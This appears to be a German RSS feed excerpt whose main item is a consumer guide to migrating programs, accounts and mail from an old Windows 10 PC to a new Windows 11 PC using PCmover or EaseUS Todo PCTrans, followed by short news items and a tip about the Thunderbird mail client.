<p>Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.</p>



<p>Umzugssoftware nimmt Ihnen diese Arbeit ab und überträgt viele Inhalte in einem Durchgang. Das lohnt sich besonders, wenn der alte Windows-10-PC ersetzt wird: Zwar gibt es über erweiterte Sicherheitsupdates noch Aufschub bis 2027, langfristig führt beim Neukauf aber meist Windows 11 den Weg vor. Wir zeigen, welche Wege es für den PC-Umzug gibt und worauf Sie achten sollten.</p>



<h2 class="wp-block-heading">Welche Wege es für den Datenumzug gibt</h2>



<p>Für den Wechsel auf einen neuen PC haben Sie drei Möglichkeiten. Spezialisierte Umzugssoftware überträgt Programme, Benutzerkonten und Dateien in einem Rutsch – der bequemste Weg, wenn installierte Anwendungen mitkommen sollen.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Bildschirm ist zu klein? Dieser 17-Zöller bietet Platz für alles</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-7.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook 7 überzeugt mit einem großzügigen 17,3 Zoll FHD-Touchdisplay für Übersicht bei Office-Arbeit, Multimedia und leichtem Gaming. Der Intel® Core™ Ultra 7 Prozessor mit 32 GB RAM meistert anspruchsvolle Aufgaben, die NVIDIA® RTX™ 4050 sorgt für zusätzliche Grafikleistung bei Kreativ-Workflows. Die beleuchtete Tastatur mit Nummernblock erleichtert die Dateneingabe, Fast Charge bringt den Akku schnell wieder auf 50 %.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11348&amp;clickref=rss&amp;ued=https://www.notebooksbilliger.de/hp+omnibook+7+17+dc0177ng+888580" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook 7</a></div></div>



<p>Die Bordmittel von Windows decken primär persönliche Dateien und ausgewählte Einstellungen ab: Über ein Microsoft-Konto und OneDrive landen synchronisierte Ordner, einige Windows-Einstellungen sowie Store-Apps auf dem neuen Gerät. Klassische Desktop-Programme müssen Sie damit jedoch neu installieren.</p>



<p>Bleibt der manuelle Umzug per externer Festplatte oder NAS. Diese Methode ist günstig und transparent, aber zeitraubend. Sie kopieren Dokumente, Bilder, Downloads, Browserprofile und Projektordner selbst und installieren anschließend jede Anwendung neu. Dieser Ratgeber stellt deshalb die komfortablere Variante mit Umzugssoftware in den Mittelpunkt und vergleicht zwei verbreitete Programme.</p>



<h2 class="wp-block-heading">Windows-Umzug mit PCmover Professional</h2>



<p><a href="https://software.pcwelt.de/offer/laplink-pcmover-professional-v11/44211?x-source=rss">PCmover Professional</a> von Laplink zählt zu den bekanntesten Umzugsprogrammen für Windows. Es kopiert Anwendungen, Daten, Benutzerkonten und Einstellungen vom alten Windows-PC auf den neuen Rechner mit Windows 11. Die Software kostet ab 34,95 Euro, eine reine Testversion reicht in der Regel nicht für einen vollständigen Programmumzug.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d5d8b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2023/06/pcmover-Transferoptionen.png?w=1200" alt="Laplink PCmover Professional v11 Optionen" class="wp-image-1945143" width="1200" height="799" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Installieren Sie PCmover zunächst auf dem alten PC, also der Quelle. Nach dem Start ist die Übertragung zwischen zwei Rechnern voreingestellt. Unter „Erweiterte Optionen“ stehen zusätzlich der Umzug per Laufwerk und per Imagedatei bereit. Ein Klick auf „Übertragung zwischen PCs“ startet den Vorgang. Vor dem Fortfahren tragen Sie Name, E-Mail-Adresse und die nach dem Kauf erhaltene Seriennummer ein.</p>



<p>Installieren und starten Sie das Programm danach auf dem Ziel-PC mit Windows 11. Beide Rechner müssen sich im selben Netzwerk befinden. Ein spezielles Kabel ist nicht nötig, wenn beide PCs per LAN oder stabilem WLAN verbunden sind. Für große Datenmengen empfiehlt sich Gigabit-LAN, weil der Transfer darüber deutlich zuverlässiger und schneller läuft als über ein schwaches Funknetz.</p>



<p>PCmover sucht den Ziel-PC und stellt die Verbindung her. Anschließend zeigt die Software beide Rechner nebeneinander an. Prüfen Sie an dieser Stelle unbedingt die Übertragungsrichtung: Quelle muss der alte PC sein, Ziel der neue Windows-11-Rechner. Bei Bedarf lässt sich die Richtung umkehren.</p>



<p>Ein Klick auf „PC analysieren“ führt zur Auswahl. Hier stehen mehrere Optionen bereit, von der empfohlenen Standardübertragung bis zur manuellen Auswahl. Mit der Standardoption wird der neue PC weitgehend zum Abbild des alten – etwa mit Windows 11 statt Windows 10. </p>



<p>Über „Weiter“ erhalten Sie eine Zusammenfassung in mehreren Kategorien. Kontrollieren Sie vordergründig den Punkt „Anwendungen“: Standardmäßig sind alle übertragbaren Programme markiert; einzelne können abgewählt werden.</p>



<p>Wie lange der Umzug dauert, hängt von der Datenmenge, dem Netzwerktempo und der Anzahl der Programme ab. Bei einem gut gefüllten PC kommen schnell mehrere Stunden zusammen. Nach Abschluss meldet das Programm den Erfolg. Starten Sie den neuen PC neu, damit alle Änderungen greifen.</p>



<h2 class="wp-block-heading">Die Alternative: EaseUS Todo PCTrans</h2>



<p>Wer nicht zwingend zu PCmover greifen möchte, findet in <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans-free.html">EaseUS Todo PCTrans</a> eine verbreitete Alternative. Das Programm überträgt ebenfalls Programme, Dateien, Benutzerkonten und Einstellungen zwischen zwei Rechnern. Der Umzug von Windows 10 auf Windows 11 zählt zu den typischen Einsatzszenarien.</p>



<p>Der wichtigste Unterschied liegt beim Einstieg. EaseUS Todo PCTrans gibt es als Free-Version, die nur fünf Programme und eine zwei Gigabyte Daten überträgt. Das genügt zum Ausprobieren oder für sehr kleine Umzüge. Wer viele Programme, große Benutzerordner oder mehrere Konten übertragen will, benötigt die kostenpflichtige <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans.html">Pro-Version</a> ab 40 Euro.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d672e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/easeus-todo-pctrans-2-2.jpg?quality=50&amp;strip=all" alt="easeus-todo-pctrans" class="wp-image-3178968" width="997" height="696" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">EaseUS</p></div>



<p>Die Bedienung folgt demselben Grundmuster wie bei PCmover. Sie installieren das Programm auf beiden Rechnern und legen über „PC zu PC“ die Richtung fest: alter PC als Quelle, neuer PC als Ziel. Beide Geräte müssen sich im selben Netzwerk befinden. Danach wählen Sie aus, welche Programme, Dateien und Konten mitkommen, und starten die Übertragung.</p>



<p>Neben dem Netzwerkweg beherrscht EaseUS Todo PCTrans auch den Umzug per Imagedatei auf einem externen Datenträger. Das ist praktisch, wenn beide PCs nicht gleichzeitig verfügbar sind oder der alte Rechner nur noch eingeschränkt läuft. Der Transfer erfolgt lokal, nicht über fremde Cloud-Server.</p>



<h2 class="wp-block-heading">PCmover oder EaseUS – was passt zu wem?</h2>



<p>Beide Programme verfolgen denselben Zweck, unterscheiden sich aber bei Preis, Bedienlogik und Zielgruppe. EaseUS Todo PCTrans ist attraktiv, wenn Sie zunächst kostenlos testen oder nur wenige Programme übertragen möchten. </p>



<p>Für einen kompletten Umzug mit vielen Anwendungen und großen Datenmengen führt dagegen auch hier meist kein Weg an einer kostenpflichtigen Version vorbei.</p>



<p>PCmover Professional richtet sich stärker an Anwender, die einen möglichst vollständigen und kontrollierten Wechsel wünschen. Das Programm ist besonders interessant, wenn der neue Rechner dem alten möglichst stark ähneln soll und viele installierte Anwendungen mitkommen müssen.</p>



<p>Für einfache Fälle reicht oft die Kombination aus OneDrive, externer Festplatte und Neuinstallation der wichtigsten Programme. Für komplexe Systeme mit vielen Anwendungen, mehreren Benutzerkonten und gewachsenen Ordnerstrukturen spart Umzugssoftware dagegen viel Zeit.</p>



<h2 class="wp-block-heading">Tipp: Mailkonten auf den neuen PC umziehen</h2>



<p>Eine Windows-Neuinstallation oder ein neuer PC sind ein guter Anlass, auch das Mailprogramm zu überdenken – etwa eM Client, Thunderbird oder Outlook. Am einfachsten gelingt der Umzug, wenn Ihre Mailkonten bereits per IMAP eingerichtet sind. Bei IMAP bleiben die Nachrichten auf dem Server Ihres Mailproviders gespeichert und werden nur mit dem jeweiligen Gerät synchronisiert.</p>



<p>Der Vorteil: Sie greifen mit PC, Notebook, Smartphone oder Webmailer auf denselben Mailbestand zu. Für den Umzug richten Sie das Konto im Mailprogramm auf dem neuen Windows-PC einfach erneut ein. Dazu starten Sie den Einrichtungsassistenten, geben E-Mail-Adresse und Passwort ein und warten anschließend, bis das Programm alle Nachrichten synchronisiert hat. Je nach Postfachgröße und Internetverbindung kann das einige Zeit dauern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d7007"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Mailstore-Home-export-IMAP-Konto.png" alt="Mailstore Home export IMAP-Konto" class="wp-image-3178966" width="1024" height="574" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Aufwendiger wird es, wenn Sie Ihre Mails bisher per POP3 abrufen. In diesem Fall liegen viele Nachrichten oft nur lokal auf dem alten Rechner. Dann sollten Sie das Postfach vor dem Wechsel sichern. Dafür eignet sich etwa <a href="https://www.pcwelt.de/article/1143948/e-mails-verwalten-mailstore-home.html">MailStore Home</a>, das für die private Nutzung kostenlos ist. Das Programm archiviert lokale Mailbestände und kann sie anschließend wieder exportieren.</p>



<p>Erstellen Sie zunächst auf dem alten PC mit MailStore Home ein Backup Ihres POP3-Postfachs und sichern Sie dieses auf einem externen Datenträger. Auf dem neuen PC installieren Sie Ihr Mailprogramm sowie MailStore Home. Dort laden Sie die Sicherung und exportieren die Nachrichten über „E-Mails exportieren“ in ein IMAP-Postfach.</p>



<p>Damit wandern die bisher nur lokal gespeicherten Mails auf den Server Ihres Providers. Anschließend stehen sie nicht nur auf dem neuen Windows-PC, sondern auch auf Smartphone, Tablet und im Webmailer synchron zur Verfügung. </p>



<p>Der Wechsel von POP3 zu IMAP lohnt sich daher besonders, wenn Sie Ihre E-Mails künftig auf mehreren Geräten nutzen möchten.</p>



<h2 class="wp-block-heading">Vor dem Umzug: Das sollten Sie beachten</h2>



<p>Unabhängig vom gewählten Programm sollten Sie vorab ein vollständiges Backup Ihrer wichtigen Daten auf einem externen Datenträger anlegen. Geht beim Transfer etwas schief, haben Sie eine unabhängige Kopie zur Hand.</p>



<p>Notieren Sie außerdem Lizenzschlüssel kostenpflichtiger Programme. Kostenlose Tools wie <a href="https://www.nirsoft.net/utils/product_cd_key_viewer.html" target="_blank" rel="noreferrer noopener">ProduKey </a>können gespeicherte Produktschlüssel auslesen, ersetzen aber keine vollständige Lizenzverwaltung – prüfen Sie daher zusätzlich die Kundenkonten der jeweiligen Softwareanbieter.</p>



<p>Manche Anwendungen verlangen nach dem Umzug eine erneute Aktivierung. Bei Programmen mit Gerätebindung kann es nötig sein, die Lizenz auf dem alten PC vorher zu deaktivieren oder im Kundenkonto freizugeben.</p>



<p>Bei Microsoft Office hängt der Aufwand von der Lizenz ab. Ein Microsoft-365-Abo oder eine an das Microsoft-Konto gebundene Office-Lizenz richten Sie auf dem neuen PC meist einfach erneut über das Konto ein. Ältere Einzelplatzlizenzen ohne Kontobindung können komplizierter sein.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d795e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Office365-Konto-Info.png?w=1200" alt="Office365 Konto-Info" class="wp-image-3178971" width="1200" height="581" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Prüfen Sie überdies, ob alle wichtigen Programme unter Windows 11 laufen. Sehr alte Tools, Spezialsoftware, Treiberpakete, Scanner-Software oder ältere VPN-Clients können Probleme verursachen. Hier ist eine Neuinstallation oft sauberer als eine blinde Übernahme.</p>



<p><strong>Wichtiger Vorab-Tipp:</strong> Deinstallieren Sie auf dem alten PC vor dem Umzug alte Druckertreiber oder tief ins System eingreifende Software (wie Antivirenprogramme von Drittanbietern). Solche Systemkomponenten werden von Umzugsprogrammen manchmal fälschlicherweise mitkopiert und können das neue Windows 11-System instabil machen.</p>



<p>Planen Sie für einen gut gefüllten PC genügend Zeit ein. Je nach Datenmenge dauert die Übertragung von einer bis zu mehreren Stunden.</p>



<p>Nach dem Umzug sollten Sie Windows Update ausführen, Programme starten, Drucker prüfen, Cloud-Synchronisierung kontrollieren und wichtige Dateien stichprobenartig öffnen.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Kann ich Programme einfach vom alten PC auf den neuen kopieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein, in der Regel reicht das Kopieren des Programmordners nicht aus. Viele Anwendungen legen Einträge in der Windows-Registry an, speichern Lizenzdaten an anderen Stellen oder installieren zusätzliche Komponenten. Deshalb müssen Programme entweder neu installiert oder mit spezieller Umzugssoftware übertragen werden.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Was ist besser: Umzugssoftware oder Neuinstallation?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Das hängt vom Zustand des alten PCs ab. Ist das System gut gepflegt und sollen viele Programme mitkommen, spart Umzugssoftware viel Zeit. Ist der alte Rechner dagegen über Jahre langsam, unübersichtlich oder fehleranfällig geworden, ist eine saubere Neuinstallation oft die bessere Wahl. Dann übernehmen Sie nur Daten und installieren Programme gezielt neu.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Werden auch Passwörter und Browserdaten übertragen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Teilweise. Browserdaten wie Lesezeichen, Verlauf und Erweiterungen lassen sich meist über das jeweilige Browserkonto synchronisieren, etwa bei Edge, Chrome oder Firefox. Gespeicherte Passwörter sollten Sie vor dem Umzug prüfen und am besten zusätzlich in einem Passwortmanager sichern. Verlassen Sie sich nicht ausschließlich darauf, dass eine Umzugssoftware alle Zugangsdaten vollständig übernimmt.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Muss der alte PC während des Umzugs weiter funktionieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Für den direkten Transfer über das Netzwerk ja. Beide Rechner müssen eingeschaltet und erreichbar sein. Alternativ können einige Programme ein Umzugsabbild auf einer externen Festplatte erstellen. Das ist praktisch, wenn der neue PC noch nicht bereitsteht oder der alte Rechner nur noch eingeschränkt nutzbar ist.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading"><strong>Was sollte ich nach dem Umzug zuerst prüfen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Starten Sie den neuen PC neu und führen Sie Windows Update aus. Danach sollten Sie wichtige Programme öffnen, Lizenzaktivierungen kontrollieren, Drucker und Scanner testen, Mailkonten prüfen und sicherstellen, dass Cloud-Dienste wie OneDrive vollständig synchronisieren. Öffnen Sie außerdem stichprobenartig wichtige Dokumente, Bilder und Projektordner.</p>
</div>
</div></div>
</div>



<p></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Windows: Veränderungen bei der Funktionsweise der Hintergrundaktivität]]></title>
<description><![CDATA[Mozilla verändert den Umgang mit Thunderbird unter Windows im Hintergrund. Bisher ist es so, dass Thunderbird in die Taskleiste (den Benachrichtigungsbereich) verschoben wird, damit es im Hintergrund weiterläuft. Diese Funktionsweise ändert sich ab Thunderbird 154. Statt in die Taskleiste minimie...]]></description>
<link>https://tsecurity.de/de/3676986/it-nachrichten/thunderbird-fuer-windows-veraenderungen-bei-der-funktionsweise-der-hintergrundaktivitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676986/it-nachrichten/thunderbird-fuer-windows-veraenderungen-bei-der-funktionsweise-der-hintergrundaktivitaet/</guid>
<pubDate>Fri, 17 Jul 2026 22:17:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla verändert den Umgang mit Thunderbird unter Windows im Hintergrund. Bisher ist es so, dass Thunderbird in die Taskleiste (den Benachrichtigungsbereich) verschoben wird, damit es im Hintergrund weiterläuft. Diese Funktionsweise ändert sich ab Thunderbird 154. Statt in die Taskleiste minimiert...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-windows-veraenderungen-bei-der-funktionsweise-der-hintergrundaktivitaet/">Thunderbird für Windows: Veränderungen bei der Funktionsweise der Hintergrundaktivität</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Community Office Hours: A Thundermail Update]]></title>
<description><![CDATA[Our Community Office Hours series is all about connecting with the people behind Thunderbird and our products, and sharing the work that’s happening behind the scenes. These conversations are a chance to learn more about the direction of our projects and to hear directly from the people making it...]]></description>
<link>https://tsecurity.de/de/3668996/tools/community-office-hours-a-thundermail-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668996/tools/community-office-hours-a-thundermail-update/</guid>
<pubDate>Tue, 14 Jul 2026 21:38:42 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Our Community Office Hours series is all about connecting with the people behind Thunderbird and our products, and sharing the work that’s happening behind the scenes. These conversations are a chance to learn more about the direction of our projects and to hear directly from the people making it happen. In this episode, we are […]</p>
<p>The post <a href="https://blog.thunderbird.net/2026/07/community-office-hours-a-thundermail-update/">Community Office Hours: A Thundermail Update</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird: Entwickler planen Änderungen]]></title>
<description><![CDATA[Wer Thunderbird nutzt, der schätzt sicherlich die enorme Flexibilität und die unzähligen Stellschrauben des Open-Source-Mailclients. Doch genau diese Stärke ist oft auch eine Schwäche: Die Einstellungsmenüs sind über die Jahre mächtig überladen und stellenweise ziemlich unübersichtlich geworden. ...]]></description>
<link>https://tsecurity.de/de/3667179/it-nachrichten/thunderbird-entwickler-planen-aenderungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667179/it-nachrichten/thunderbird-entwickler-planen-aenderungen/</guid>
<pubDate>Tue, 14 Jul 2026 09:35:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer Thunderbird nutzt, der schätzt sicherlich die enorme Flexibilität und die unzähligen Stellschrauben des Open-Source-Mailclients. Doch genau diese Stärke ist oft auch eine Schwäche: Die Einstellungsmenüs sind über die Jahre mächtig überladen und stellenweise ziemlich unübersichtlich geworden. Das Entwicklerteam hat...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-entwickler-planen-aenderungen/">Thunderbird: Entwickler planen Änderungen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So blenden Sie die Titelleiste in Thunderbird ein und passen die Farbe an]]></title>
<description><![CDATA[Das E-Mail-Programm Thunderbird zeigt in den neueren Versionen keine Titelleiste mehr an. Und wenn es sie anzeigt, dann oft nicht in der gewünschten Farbe. Beides können Sie ändern. Um die Titelleiste von Thunderbird zunächst wieder einzublenden, klicken Sie bitte rechts oben auf die drei waagrec...]]></description>
<link>https://tsecurity.de/de/3666984/windows-tipps/so-blenden-sie-die-titelleiste-in-thunderbird-ein-und-passen-die-farbe-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666984/windows-tipps/so-blenden-sie-die-titelleiste-in-thunderbird-ein-und-passen-die-farbe-an/</guid>
<pubDate>Tue, 14 Jul 2026 08:14:00 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das E-Mail-Programm <a href="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" target="_blank" rel="noreferrer noopener">Thunderbird</a> zeigt in den neueren Versionen keine Titelleiste mehr an. Und wenn es sie anzeigt, dann oft nicht in der gewünschten Farbe. Beides können Sie ändern. Um die Titelleiste von Thunderbird zunächst wieder einzublenden, klicken Sie bitte rechts oben auf die drei waagrechten Striche (das „Hamburger-Menü“) und gehen im folgenden Menü auf „Einstellungen“. </p>



<p>Wählen Sie in der linken Spalte „Erscheinungsbild“ und löschen Sie jetzt im Hauptfenster in dem Abschnitt „Fensterlayout“ das Häkchen bei „Titelleiste des Systemfensters ausblenden“. Die Leiste ist danach sofort sichtbar. Um der Leiste eine bestimmte Farbe zuzuweisen, öffnen Sie über das Startmenü die „Einstellungen“ von Windows. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a55d398ad78a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/thunderbird_RGBeci.jpg?quality=50&amp;strip=all" alt="Thunderbird Titelleiste ein- und ausschalten" class="wp-image-3125896" width="976" height="531" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Sie können in Thunderbird die Anzeige der Titelleiste ein- und ausschalten. Die Farbe der Leiste regeln Sie über die Einstellungen von Windows.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



